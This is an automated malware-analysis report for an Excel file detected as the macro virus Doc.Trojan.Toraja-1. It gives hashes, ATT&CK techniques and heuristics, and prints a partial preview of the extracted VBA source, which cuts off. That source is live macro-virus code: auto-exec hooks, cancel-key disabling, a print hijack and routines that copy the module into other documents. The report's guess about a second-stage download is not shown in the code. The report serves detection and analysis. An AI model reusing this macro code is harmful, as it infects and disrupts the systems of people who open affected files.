Doc.Trojan.Toraja-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 165b63f08b441601…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 62.5 KB
Created: 2002-02-20 07:43:42
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: 0f429bbe19873cf1e7435801576d5938
SHA-1: 8cfd96d709822881e5d0421e056e2daa41a6d113
SHA-256: 165b63f08b44160145e8f100c9632690e7372a8ef6d59d93ea9703a960d5c588
Risk Score: 300

Malware Insights

Doc.Trojan.Toraja-1 · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The file is an Office document containing VBA macros, specifically triggering AutoOpen and CreateObject heuristics, indicating malicious intent. The ClamAV detection 'Doc.Trojan.Toraja-1' strongly suggests this family. The VBA script likely attempts to download and execute a second-stage payload, as indicated by the 'CreateObject' call and the general behavior associated with this detection name.

Heuristics (6)

  • [critical] ClamAV: Doc.Trojan.Toraja-1 (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Toraja-1
  • [medium] VBA macros detected, 4 related findings (OLE_VBA_MACROS)
    Document contains VBA macro code
  • [high] AutoOpen macro (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • [high] Auto_Open macro (OLE_VBA_AUTO)
    Auto_Open macro
  • [high] CreateObject call (OLE_VBA_CREATEOBJ)
    CreateObject call
  • [high] VBA p-code auto-exec with execution tokens (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 16919 bytes
SHA-256: c1473e5f3ccf34615c0385aa338434c8705a88b522495c1fc646928523b4eb22
Detection
ClamAV: Doc.Trojan.Toraja-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_BeforePrint(Cancel As Boolean)
On Error Resume Next
If PrintOke = False Then
    Serang
    Cancel = True
End If
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Toraja12"






'Created       : Toraja High Land 1998 by Marsel - Lina
'Modified       : July 1999
'--------------------------------------------------------------
Option Explicit
Option Compare Text
Dim Komp As Variant
Public Const regApp As String = "Application"
Public Const regSecSet As String = "Settings"
Public Const regSecApp As String = "AppName"
Const TempVer As String = "Tana"
Const MacName As String = "Toraja"
Const Ver As String = "12"
Dim ctl As Variant
Global blnFound As Boolean
Dim CusProp
Dim blnMod As Boolean
Public Const TimerOn = "01:00:00"
Const Akhir = 80
Dim Caption As String
Dim actWindow
Global Active
Global Temp
Global TempPath
Dim Waktu
Dim Bar As Integer
Sub Register()
Attribute Register.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next


If GetSetting(regApp, regSecSet, "Version") <> Ver Then SaveSetting regApp, regSecSet, "Version", Ver
If GetSetting(regApp, regSecSet, "UserKeyWord") <> MacName & Ver Then SaveSetting regApp, regSecSet, "UserKeyWord", ""
If GetSetting(regApp, regSecSet, "AuthorKeyWord") <> "Marsel" Then SaveSetting regApp, regSecSet, "AuthorKeyWord", ""
End Sub
Function Serang() As Boolean
Attribute Serang.VB_ProcData.VB_Invoke_Func = " \n14"
Dim getDate As Date
On Error Resume Next
getDate = GetSetting(regApp, regSecSet, "FirstRun")
If getDate <= Date Then ShowMe
End Function
Sub AutoExec()
Attribute AutoExec.VB_ProcData.VB_Invoke_Func = " \n14"
        Application.EnableCancelKey = 0
        Application.DisplayRecentFiles = False
        SaveSetting regApp, regSecApp, "Microsoft Word", "True"
        MenuWord
        ExportXls
        Register
        Documents.Add
        Application.OnTime Now + TimeValue(TimerOn), "OnTimer"
End Sub
Sub AutoNew()
Attribute AutoNew.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next
TempActive
ActiveWindow.View.Type = 3
End Sub
Sub AutoOpen()
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next
Dim strRun As String
        Application.EnableCancelKey = 0
        If PWords = False Then Application.ShowVisualBasicEditor = False
        ActiveTemp
        RemoveAll
        MenuWord
        Register
        If blnFound = True Then
            strRun = TempVer & Ver & "." & MacName & Ver & ".FoundIt"
            Application.OnTime Now + TimeValue("00:01:00"), strRun
       End If
End Sub
Function KeyWord() As Boolean
Attribute KeyWord.VB_ProcData.VB_Invoke_Func = " \n14"
If GetSetting(regApp, regSecSet, "UserKeyWord") = MacName & Ver Then KeyWord = True
End Function
Sub FileOpen()
Attribute FileOpen.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next
    WordBasic.DisableAutoMacros 1
    Dialogs(80).Show
    TempActive
    WordBasic.DisableAutoMacros 0
End Sub
Function KompProject(Asal, Tujuan) As Boolean
Attribute KompProject.VB_ProcData.VB_Invoke_Func = " \n14"
On Error GoTo Salah
blnMod = False
For Each Komp In Tujuan.VBProject.VBComponents
      If Komp.Name = MacName & Ver Then blnMod = True
      If (Komp.Name <> "ThisDocument") And (Komp.Name <> "Reference To Normal") And (Komp.Name <> MacName & Ver) And _
          (Left(Komp.Name, 5) <> "Sheet") And (Komp.Name <> "ThisWorkbook") And (Left(Komp.Name, 5) <> "Chart") Then
            Tuj
... (truncated)